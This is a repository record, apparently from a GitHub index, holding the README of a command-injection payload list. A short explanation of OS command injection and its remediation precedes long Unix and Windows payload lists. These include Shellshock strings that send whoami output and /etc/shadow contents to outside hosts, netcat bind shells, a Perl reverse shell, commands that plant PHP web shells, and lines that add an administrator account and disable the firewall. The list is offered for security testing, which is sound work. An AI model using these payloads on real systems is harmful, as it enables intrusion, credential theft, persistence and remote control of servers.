{"id":13539738,"url":"https://github.com/payloadbox/command-injection-payload-list","last_synced_at":"2025-05-15T01:04:34.451Z","repository":{"id":38362010,"uuid":"156012620","full_name":"payloadbox/command-injection-payload-list","owner":"payloadbox","description":"🎯 Command Injection Payload List","archived":false,"fork":false,"pushed_at":"2024-07-18T03:15:46.000Z","size":24,"stargazers_count":2975,"open_issues_count":3,"forks_count":634,"subscribers_count":73,"default_branch":"master","last_synced_at":"2024-10-29T17:56:25.738Z","etag":null,"topics":["application","application-security","bugbounty","command","command-injection","injection","linux","macos","os","os-injection","payload","payload-list","security","security-research","security-testing","security-vulnerability","unix","vulnerability","vulnerability-research","windows"],"latest_commit_sha":null,"homepage":"https://ismailtasdelen.medium.com","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/payloadbox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":"ismailtasdelen","issuehunt":null,"otechie":null,"custom":null}},"created_at":"2018-11-03T18:35:08.000Z","updated_at":"2024-10-28T16:26:55.000Z","dependencies_parsed_at":"2024-11-19T18:15:41.140Z","dependency_job_id":"711a4558-0461-4b1c-af47-089ed2a5bbf2","html_url":"https://github.com/payloadbox/command-injection-payload-list","commit_stats":null,"previous_names":[],"tags_count":0,"t
emplate":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/payloadbox%2Fcommand-injection-payload-list/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/payloadbox","download_url":"https://codeload.github.com/payloadbox/command-injection-payload-list/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248368441,"owners_count":21092360,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["application","application-security","bugbounty","command","command-injection","injection","linux","macos","os","os-injection","payload","payload-list","security","security-research","security-testing","security-vulnerability","unix","vulnerability","vulnerability-research","windows"],"created_at":"2024-08-01T09:01:31.160Z","updated_at":"2025-04-11T09:34:40.187Z","avatar_url":"https://github.com/payloadbox.png","language":null,"readme":"## Command Injection Payload List\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\"\u003e \u003cimg 
src=\"https://img.shields.io/github/stars/payloadbox/command-injection-payload-list?style=social\"\u003e \u003cimg src=\"https://img.shields.io/github/forks/payloadbox/command-injection-payload-list?style=social\"\u003e \u003cimg src=\"https://img.shields.io/github/repo-size/payloadbox/command-injection-payload-list\"\u003e \u003cimg src=\"https://img.shields.io/github/license/payloadbox/command-injection-payload-list\"\u003e \u003cimg src=\"https://img.shields.io/github/issues/detail/author/payloadbox/command-injection-payload-list/1\"\u003e\n\u003c/p\u003e\n\nCommand injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.\n\nThis attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which executes system commands, without the necessity of injecting code.\n\n## What is OS command injection?\n\nOS command injection is a critical vulnerability that allows attackers to gain complete control over an affected web site and the underlying web server.\n\nOS command injection vulnerabilities arise when an application incorporates user data into an operating system command that it executes. An attacker can manipulate the data to cause their own commands to run. 
This allows the attacker to carry out any action that the application itself can carry out, including reading or modifying all of its data and performing privileged actions.\n\nIn addition to total compromise of the web server itself, an attacker can leverage a command injection vulnerability to pivot the attack into the organization's internal infrastructure, potentially accessing any system which the web server can access. They may also be able to create a persistent foothold within the organization, continuing to access compromised systems even after the original vulnerability has been fixed.\n\n## Description :\n\nOperating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.\n\nOS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.\n\n## Remediation:\n\nIf possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands other than the one intended.\n\nIf it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:\n\n* The user data should be strictly validated. 
Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.\n\n* The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate\n\n### Unix :\n\n```\n\u0026lt;!--#exec%20cmd=\u0026quot;/bin/cat%20/etc/passwd\u0026quot;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/bin/cat%20/etc/shadow\u0026quot;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/usr/bin/id;--\u0026gt;\n\u0026lt;!--#exec%20cmd=\u0026quot;/usr/bin/id;--\u0026gt;\n/index.html|id|\n;id;\n;id\n;netstat -a;\n;system('cat%20/etc/passwd')\n;id;\n|id\n|/usr/bin/id\n|id|\n|/usr/bin/id|\n||/usr/bin/id|\n|id;\n||/usr/bin/id;\n;id|\n;|/usr/bin/id|\n\\n/bin/ls -al\\n\n\\n/usr/bin/id\\n\n\\nid\\n\n\\n/usr/bin/id;\n\\nid;\n\\n/usr/bin/id|\n\\nid|\n;/usr/bin/id\\n\n;id\\n\n|usr/bin/id\\n\n|nid\\n\n`id`\n`/usr/bin/id`\na);id\na;id\na);id;\na;id;\na);id|\na;id|\na)|id\na|id\na)|id;\na|id\n|/bin/ls -al\na);/usr/bin/id\na;/usr/bin/id\na);/usr/bin/id;\na;/usr/bin/id;\na);/usr/bin/id|\na;/usr/bin/id|\na)|/usr/bin/id\na|/usr/bin/id\na)|/usr/bin/id;\na|/usr/bin/id\n;system('cat%20/etc/passwd')\n;system('id')\n;system('/usr/bin/id')\n%0Acat%20/etc/passwd\n%0A/usr/bin/id\n%0Aid\n%0A/usr/bin/id%0A\n%0Aid%0A\n\u0026 ping -i 30 127.0.0.1 \u0026\n\u0026 ping -n 30 127.0.0.1 \u0026\n%0a ping -i 30 127.0.0.1 %0a\n`ping 127.0.0.1`\n| id\n\u0026 id\n; id\n%0a id %0a\n`id`\n$;/usr/bin/id\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\\`whoami\\`\"\n() { :;}; /bin/bash -c \"curl 
http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\\`pwd\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\\`grep root /etc/shadow\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname -a\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\\`nc -lvvp 1234 -e /bin/bash\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\\`nc -lvvp 1236 -e /bin/bash \u0026\\`\"\n() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=5\"\n() { :;}; /bin/bash -c \"sleep 1 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=1\u0026?vuln=6\"\n() { :;}; /bin/bash -c \"sleep 1 \u0026\u0026 echo vulnerable 1\"\n() { :;}; /bin/bash -c \"sleep 3 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=3\u0026?vuln=7\"\n() { :;}; /bin/bash -c \"sleep 3 \u0026\u0026 echo vulnerable 3\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=6\u0026?vuln=8\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 curl http://135.23.158.130/.testing/shellshock.txt?sleep=9\u0026?vuln=9\"\n() { :;}; /bin/bash -c \"sleep 6 \u0026\u0026 echo vulnerable 6\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\\`whoami\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\\`pwd\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\\`grep root /etc/shadow\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\\`uname -a\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\\`nc -lvvp 1235 -e /bin/bash\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\\`nc -lvvp 1237 
-e /bin/bash \u0026\\`\"\n() { :;}; /bin/bash -c \"wget http://135.23.158.130/.testing/shellshock.txt?vuln=4\"\ncat /etc/hosts\n$(`cat /etc/passwd`)\ncat /etc/passwd\n%0Acat%20/etc/passwd\n{{ get_user_file(\"/etc/passwd\") }}\n\u003c!--#exec cmd=\"/bin/cat /etc/passwd\"--\u003e\n\u003c!--#exec cmd=\"/bin/cat /etc/shadow\"--\u003e\n\u003c!--#exec cmd=\"/usr/bin/id;--\u003e\nsystem('cat /etc/passwd');\n\u003c?php system(\"cat /etc/passwd\");?\u003e\n```\n\n### Windows :\n\n```\n`\n|| \n| \n; \n'\n'\"\n\"\n\"'\n\u0026 \n\u0026\u0026 \n%0a\n%0a%0d\n\n%0Aid\n%0a id %0a\n%0Aid%0A\n%0a ping -i 30 127.0.0.1 %0a\n%0A/usr/bin/id\n%0A/usr/bin/id%0A\n%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1\n%20{${phpinfo()}}\n%20{${sleep(20)}}\n%20{${sleep(3)}}\na|id|\na;id|\na;id;\na;id\\n\n() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12\n| curl http://crowdshield.com/.testing/rce.txt\n\u0026 curl http://crowdshield.com/.testing/rce.txt\n; curl https://crowdshield.com/.testing/rce_vuln.txt\n\u0026\u0026 curl https://crowdshield.com/.testing/rce_vuln.txt\ncurl https://crowdshield.com/.testing/rce_vuln.txt\n curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\\\" |curl https://crowdshield.com/.testing/rce_vuln.txt\ncurl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\\\" |curl https://crowdshield.com/.testing/rce_vuln.txt\n$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)\ndir\n| dir\n; dir\n$(`dir`)\n\u0026 dir\n\u0026\u0026dir\n\u0026\u0026 dir\n| dir C:\\\n; dir C:\\\n\u0026 dir C:\\\n\u0026\u0026 dir C:\\\ndir C:\\\n| dir C:\\Documents and 
Settings\\*\n; dir C:\\Documents and Settings\\*\n\u0026 dir C:\\Documents and Settings\\*\n\u0026\u0026 dir C:\\Documents and Settings\\*\ndir C:\\Documents and Settings\\*\n| dir C:\\Users\n; dir C:\\Users\n\u0026 dir C:\\Users\n\u0026\u0026 dir C:\\Users\ndir C:\\Users\n;echo%20'\u003cscript\u003ealert(1)\u003c/script\u003e'\necho '\u003cimg src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)\u003e\u003c/img\u003e'// XXXXXXXXXXX\n| echo \"\u003c?php include($_GET['page'])| ?\u003e\" \u003e rfi.php\n; echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n\u0026 echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n\u0026\u0026 echo \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\necho \"\u003c?php include($_GET['page']); ?\u003e\" \u003e rfi.php\n| echo \"\u003c?php system('dir $_GET['dir']')| ?\u003e\" \u003e dir.php \n; echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \n\u0026 echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \n\u0026\u0026 echo \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php \necho \"\u003c?php system('dir $_GET['dir']'); ?\u003e\" \u003e dir.php\n| echo \"\u003c?php system($_GET['cmd'])| ?\u003e\" \u003e cmd.php\n; echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n\u0026 echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n\u0026\u0026 echo \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\necho \"\u003c?php system($_GET['cmd']); ?\u003e\" \u003e cmd.php\n;echo '\u003cscript\u003ealert(1)\u003c/script\u003e'\necho '\u003cscript\u003ealert(1)\u003c/script\u003e'// XXXXXXXXXXX\necho '\u003cscript src=https://crowdshield.com/.testing/xss.js\u003e\u003c/script\u003e'// XXXXXXXXXXX\n| echo \"use 
Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e;S\");open(STDOUT,\"\u003e;S\");open(STDERR,\"\u003e;S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e;S\");open(STDOUT,\"\u003e;S\");open(STDERR,\"\u003e;S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n\u0026 echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n\u0026\u0026 echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\necho \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};\" \u003e rev.pl\n() { :;}; echo vulnerable 10\neval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\neval('ls')\neval('pwd')\neval('pwd');\neval('sleep 5')\neval('sleep 5');\neval('whoami')\neval('whoami');\nexec('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nexec('ls')\nexec('pwd')\nexec('pwd');\nexec('sleep 5')\nexec('sleep 5');\nexec('whoami')\nexec('whoami');\n;{$_GET[\"cmd\"]}\n`id`\n|id\n| id\n;id\n;id|\n;id;\n\u0026 id\n\u0026\u0026id\n;id\\n\nifconfig\n| ifconfig\n; ifconfig\n\u0026 ifconfig\n\u0026\u0026 ifconfig\n/index.html|id|\nipconfig\n| ipconfig /all\n; ipconfig /all\n\u0026 ipconfig /all\n\u0026\u0026 ipconfig /all\nipconfig /all\nls\n$(`ls`)\n| ls -l /\n; ls -l /\n\u0026 ls -l /\n\u0026\u0026 ls -l /\nls -l /\n| ls -laR /etc\n; 
ls -laR /etc\n\u0026 ls -laR /etc\n\u0026\u0026 ls -laR /etc\n| ls -laR /var/www\n; ls -laR /var/www\n\u0026 ls -laR /var/www\n\u0026\u0026 ls -laR /var/www\n| ls -l /etc/\n; ls -l /etc/\n\u0026 ls -l /etc/\n\u0026\u0026 ls -l /etc/\nls -l /etc/\nls -lh /etc/\n| ls -l /home/*\n; ls -l /home/*\n\u0026 ls -l /home/*\n\u0026\u0026 ls -l /home/*\nls -l /home/*\n*; ls -lhtR /var/www/\n| ls -l /tmp\n; ls -l /tmp\n\u0026 ls -l /tmp\n\u0026\u0026 ls -l /tmp\nls -l /tmp\n| ls -l /var/www/*\n; ls -l /var/www/*\n\u0026 ls -l /var/www/*\n\u0026\u0026 ls -l /var/www/*\nls -l /var/www/*\n\\n\n\\n\\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\\`whoami\\`\n\\n\\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\\`whoami\\`\n\\n/bin/ls -al\\n\n| nc -lvvp 4444 -e /bin/sh|\n; nc -lvvp 4444 -e /bin/sh;\n\u0026 nc -lvvp 4444 -e /bin/sh\u0026\n\u0026\u0026 nc -lvvp 4444 -e /bin/sh \u0026\nnc -lvvp 4444 -e /bin/sh\nnc -lvvp 4445 -e /bin/sh \u0026\nnc -lvvp 4446 -e /bin/sh|\nnc -lvvp 4447 -e /bin/sh;\nnc -lvvp 4448 -e /bin/sh\u0026\n\\necho INJECTX\\nexit\\n\\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\\n\n\\necho INJECTX\\nexit\\n\\033[2Asleep 5\\n\n\\necho INJECTX\\nexit\\n\\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\\n\n| net localgroup Administrators hacker /ADD\n; net localgroup Administrators hacker /ADD\n\u0026 net localgroup Administrators hacker /ADD\n\u0026\u0026 net localgroup Administrators hacker /ADD\nnet localgroup Administrators hacker /ADD\n| netsh firewall set opmode disable\n; netsh firewall set opmode disable\n\u0026 netsh firewall set opmode disable\n\u0026\u0026 netsh firewall set opmode disable\nnetsh firewall set opmode disable\nnetstat\n;netstat -a;\n| netstat -an\n; netstat -an\n\u0026 netstat -an\n\u0026\u0026 netstat -an\nnetstat -an\n| net user hacker Password1 /ADD\n; net user hacker Password1 /ADD\n\u0026 net user hacker Password1 /ADD\n\u0026\u0026 net user hacker Password1 /ADD\nnet 
user hacker Password1 /ADD\n| net view\n; net view\n\u0026 net view\n\u0026\u0026 net view\nnet view\n\\nid|\n\\nid;\n\\nid\\n\n\\n/usr/bin/id\\n\nperl -e 'print \"X\"x1024'\n|| perl -e 'print \"X\"x16096'\n| perl -e 'print \"X\"x16096'\n; perl -e 'print \"X\"x16096'\n\u0026 perl -e 'print \"X\"x16096'\n\u0026\u0026 perl -e 'print \"X\"x16096'\nperl -e 'print \"X\"x16384'\n; perl -e 'print \"X\"x2048'\n\u0026 perl -e 'print \"X\"x2048'\n\u0026\u0026 perl -e 'print \"X\"x2048'\nperl -e 'print \"X\"x2048'\n|| perl -e 'print \"X\"x4096'\n| perl -e 'print \"X\"x4096'\n; perl -e 'print \"X\"x4096'\n\u0026 perl -e 'print \"X\"x4096'\n\u0026\u0026 perl -e 'print \"X\"x4096'\nperl -e 'print \"X\"x4096'\n|| perl -e 'print \"X\"x8096'\n| perl -e 'print \"X\"x8096'\n; perl -e 'print \"X\"x8096'\n\u0026\u0026 perl -e 'print \"X\"x8096'\nperl -e 'print \"X\"x8192'\nperl -e 'print \"X\"x81920'\n|| phpinfo()\n| phpinfo()\n {${phpinfo()}}\n;phpinfo()\n;phpinfo();//\n';phpinfo();//\n{${phpinfo()}}\n\u0026 phpinfo()\n\u0026\u0026 phpinfo()\nphpinfo()\nphpinfo();\n\u003c?php system(\"curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get\");?\u003e\n\u003c?php system(\"curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj\");?\u003e\n\u003c?php system(\"echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX